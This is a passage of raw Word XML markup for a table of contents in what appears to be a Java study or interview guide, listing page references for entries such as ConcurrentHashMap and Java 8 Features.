              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EA7CB13" w14:textId="0F03588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ynchronizedHashMap and ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867405 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>291</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4626787C" w14:textId="59500D2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7867406 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>294</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CE90C0E" w14:textId="1BF1D6E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7867407 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>296</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23805B37" w14:textId="1D94D61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7867408 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>298</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E381690" w14:textId="7E4D43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7867409 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>298</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18C65407" w14:textId="1024A9A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7867410 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>299</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B924F7C" w14:textId="05F6AF4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7867411 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>301</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="070011B5" w14:textId="4BF0419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7867412 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>304</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28B3EF13" w14:textId="5B48576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ashSet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867413 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>304</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19E766B9" w14:textId="49429F2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7867414 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>305</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D5C913C" w14:textId="6E8D891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7867415 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>306</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="433C9652" w14:textId="4A73F8F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7867416 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>307</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="065F945F" w14:textId="04638C7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7867417 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>308</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BCBA60E" w14:textId="554CB72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7867418 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>309</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EAE1AA2" w14:textId="7F6966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7867419 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>311</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2840B7DB" w14:textId="19A5A10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7867420 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>312</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55DA21E7" w14:textId="0F1F541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7867421 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>314</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C53707D" w14:textId="324DEE6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7867422 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>316</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="180F2F86" w14:textId="18F7A6DD"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23" w:history="1">
            <w:r w:rsidRPr="006E6F1F">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7867423 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>318</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="199EDF6E" w14:textId="1155D33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7867424 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>318</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EEE37D4" w14:textId="668C293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7867425 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>319</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13E0BB0D" w14:textId="3C70B1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7867426 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>321</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F749F17" w14:textId="5CD7C29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7867427 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>322</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28080621" w14:textId="3527D3D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7867428 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>323</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56DFF27C" w14:textId="1C24528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7867429 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>324</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6866585C" w14:textId="733138B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7867430 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>324</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3958AF0B" w14:textId="60918F5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7867431 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>325</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A4008DF" w14:textId="48861D6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7867432 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25A11E9E" w14:textId="2238AA1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7867433 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>327</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31205171" w14:textId="50E070D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7867434 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>328</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FE11ED0" w14:textId="5242320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7867435 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>329</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A67E555" w14:textId="3887407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7867436 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>330</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ED5CA91" w14:textId="2A00AF23"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37" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java 8 Features</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867437 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>333</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AC8EA9A" w14:textId="2A9454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7867438 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>333</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78DCEC2F" w14:textId="0E5A995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7867439 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>334</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E5DC9E6" w14:textId="793A3C1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7867440 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>335</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F175C16" w14:textId="3DA8B08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7867441 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>337</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E34A889" w14:textId="4678A60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7867442 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>339</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05326305" w14:textId="708F1C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7867443 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>341</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="790D62B9" w14:textId="1445841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7867444 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>342</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11913DFC" w14:textId="0D1E02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7867445 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
